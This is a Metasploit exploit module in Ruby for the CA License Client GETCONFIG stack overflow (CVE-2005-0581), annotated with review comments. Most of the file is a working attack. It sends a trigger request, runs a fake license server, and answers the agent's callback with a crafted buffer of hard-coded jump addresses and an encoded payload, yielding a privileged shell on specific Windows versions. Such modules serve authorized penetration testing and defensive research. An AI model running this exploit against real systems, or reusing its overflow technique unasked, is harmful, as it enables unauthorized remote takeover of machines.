##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Remote exploit module for the CA License Client (lic98rmt) GETCONFIG overflow
# (CVE-2005-0581). Flow: connect to the agent on RPORT and send one GETSERVER
# request, then stand up a fake license server on SRVPORT and wait for the
# agent to connect back; the oversized GETCONFIG SELF argument sent over that
# callback connection is what triggers the overflow.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, targets, payload constraints)
  # and the two options this module reads: RPORT (agent port) and SRVPORT
  # (the port the fake license server listens on).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Computer Associates License Client GETCONFIG Overflow',
        'Description' => %q{
This module exploits a vulnerability in the CA License Client
service. This exploit will only work if your IP address can be
resolved from the target system point of view. This can be
accomplished on a local network by running the 'nmbd' service
that comes with Samba. If you are running this exploit from
Windows and do not filter udp port 137, this should not be a
problem (if the target is on the same network segment). Due to
the bugginess of the software, you are only allowed one connection
to the agent port before it starts ignoring you. If it wasn't for this
issue, it would be possible to repeatedly exploit this bug.
        },
        'Author' => [
          'hdm', # original msf v2 module
          'aushack', # msf v3 port :)
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0581' ],
          [ 'OSVDB', '14389' ],
          [ 'BID', '12705' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
        ],
        # The license service runs with elevated privileges, so a successful
        # run yields a privileged session.
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          # Payload is placed at offset 272 of a 900-byte buffer (see #exploit),
          # so 600 bytes of space fits with room to spare.
          'Space' => 600,
          # NUL and space are excluded; space presumably because the request
          # line is space-delimited (see the GETCONFIG SELF format in #exploit).
          'BadChars' => "\x00\x20",
          'StackAdjustment' => -3500,

        },
        'Platform' => 'win',
        # Each target carries three hard-coded addresses used in order as:
        # a "jmp esi" gadget, a writable address, and a "jmp edi" gadget.
        # They are OS/service-pack specific, which is why there is no
        # 'Automatic' target.
        'Targets' => [
          # As much as I would like to return back to the DLL or EXE,
          # all of those modules have a leading NULL in the
          # loaded @ address :(
          # name, jmp esi, writable, jmp edi
          # ['Automatic', {} ],
          #
          # aushack - tested OK Windows XP English SP0-1 only 20100214
          ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
          ['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
        ],
        'DisclosureDate' => '2005-03-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Port of the license agent on the target.
        Opt::RPORT(10203),
        # Local port on which the fake license server is bound; the agent
        # must be able to resolve and reach this host on it.
        OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
      ]
    )
  end

  # def check
  # It is possible to check, but due to a software bug, checking prevents exploitation
  # end

  # Runs the two-phase exchange: (1) one outbound GETSERVER request to the
  # agent, (2) a local listener that answers the agent's callback with the
  # overflowing GETCONFIG SELF request. No check is performed first because,
  # per the note above, the agent accepts only one connection on its port.
  def exploit
    # `connect` opens the TCP session to RHOST:RPORT; the guard skips
    # everything if the connection could not be established.
    if (connect)
      sock.put("A0 GETSERVER<EOM>\n")
      print_status("Initial packet sent to remote agent...")
      disconnect

      # Fake license server. Note it binds 0.0.0.0, i.e. every local
      # interface, and stays open until the ensure block below closes it.
      fakecaservice = Rex::Socket::TcpServer.create(
        'LocalHost' => '0.0.0.0',
        'LocalPort' => datastore['SRVPORT'],
        'SSL' => false,
        'Context' =>
        {
          'Msf' => framework,
          'MsfExploit' => self,
        }
      )

      # Register the listener with the module so the framework can track and
      # clean it up.
      add_socket(fakecaservice)

      fakecaservice.start
      print_status("Waiting for the license agent to connect back...")
      begin
        # The agent gets three seconds to call back; Timeout::Error is raised
        # into this block otherwise.
        Timeout.timeout(3) do
          # `done` is never set to true below, so the loop only ends when
          # accept returns a falsy value, an exception is raised, or the
          # timeout fires.
          done = false
          while (not done and session = fakecaservice.accept)
            # NOTE(review): Rex::Socket.source_address(rhost) yields the local
            # address used to reach rhost, not the peer that just connected, so
            # this line likely logs this host's address rather than the agent's.
            print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
            # Benign probe first: a zero-length GETCONFIG SELF elicits the
            # agent's configuration record.
            session.put("A0 GETCONFIG SELF 0<EOM>")
            # recvfrom returns [data, ...]; only the data is kept. The 2000
            # argument is presumably the maximum read size - TODO confirm.
            req = session.recvfrom(2000)[0]
            next if not req
            next if req.empty?

            # Pull the OS<...> field out of the GCR reply (see the sample
            # records after the class) purely for operator feedback.
            if (req =~ /OS\<([^\>]+)/)
              print_status("Target reports OS: #{$1}")
            end

            # exploits two different versions at once >:-)
            # 144 -> return address of esi points to string middle
            # 196 -> return address of edi points to string beginning
            # 148 -> avoid exception by patching with writable address
            # 928 -> seh handler (not useful under XP SP2)
            buff = rand_text_alphanumeric(900)
            buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
            buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
            buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
            buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
            buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
            # Encoded payload overwrites the buffer from offset 272 onward
            # (bounded by 'Space' => 600 in the metadata).
            buff[272, payload.encoded.length] = payload.encoded

            sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
            session.put(sploit)
            session.close
          end
        end
      ensure
        # Hand off to the payload handler, then tear down the listener.
        handler
        fakecaservice.close
        # NOTE(review): an explicit `return` inside `ensure` discards any
        # exception in flight - including the Timeout::Error raised when no
        # agent calls back - so a failed callback ends silently with no
        # error reported to the operator.
        return
      end
    end
  end
end
=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end